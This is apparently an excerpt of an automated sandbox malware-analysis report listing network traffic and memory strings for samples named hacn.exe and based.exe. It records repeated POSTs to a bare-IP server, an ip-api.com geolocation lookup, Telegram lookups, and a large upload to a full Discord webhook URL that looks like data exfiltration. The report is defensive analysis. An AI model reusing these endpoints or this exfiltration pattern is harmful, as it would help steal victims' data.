                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 1996Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 194.58.42.154Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: unknownTCP traffic detected without corresponding DNS query: 194.58.42.154
                                  Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                                  Source: based.exe, 00000004.00000002.2386609527.00000201D10B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                                  Source: global trafficDNS traffic detected: DNS query: ip-api.com
                                  Source: global trafficDNS traffic detected: DNS query: discord.com
                                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                  Source: unknownHTTP traffic detected: POST /api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 761014User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=ae617a8a1c033a753623c0f68de035b0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Aug 2024 02:28:09 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=b151a2c64fad11ef8beb969bb34c99ef; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1722479290x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2C1ydocOQ2xMnFPXwJ2xVHefN1DwZxzUkt2yGnLAoV7iE5WV0r3QSdBKpqiNDNqOhMPa%2BBjzZBcJFV%2BK2fq8nEamAve7E2UQCVSILjZ9873ZF8SlAKmdavBLDQY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=b151a2c64fad11ef8beb969bb34c99ef78f5274c8378281a77dc6bf9633760fb25a9feef22631a2c005696eb41e4adde; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=3d905955f4beffde0eab7938151d2b1d8621eb2e-1722479289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                  Source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: powershell.exe, 00000011.00000002.2043962328.0000028A53BF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                                  Source: based.exe, 00000002.00000002.2420679707.000001F9199F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Digi
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686946988.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: based.exe, 00000002.00000003.1670882598.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1680060295.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E46A0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1667377983.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000001.00000003.1671005572.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686661461.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1686523141.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1685225520.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669605315.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1671355817.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670474700.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1668292135.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669776404.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1670185693.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1669984730.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: based.exe, 00000002.00000003.1684490316.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1684490316.000001F919A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: based.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1683685878.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                  Source: based.exe, 00000002.00000003.1685896467.000001F919A10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: based.exe, 00000004.00000003.1700875688.00000201D052B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                                  Source: based.exe, 00000004.00000003.1857154542.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
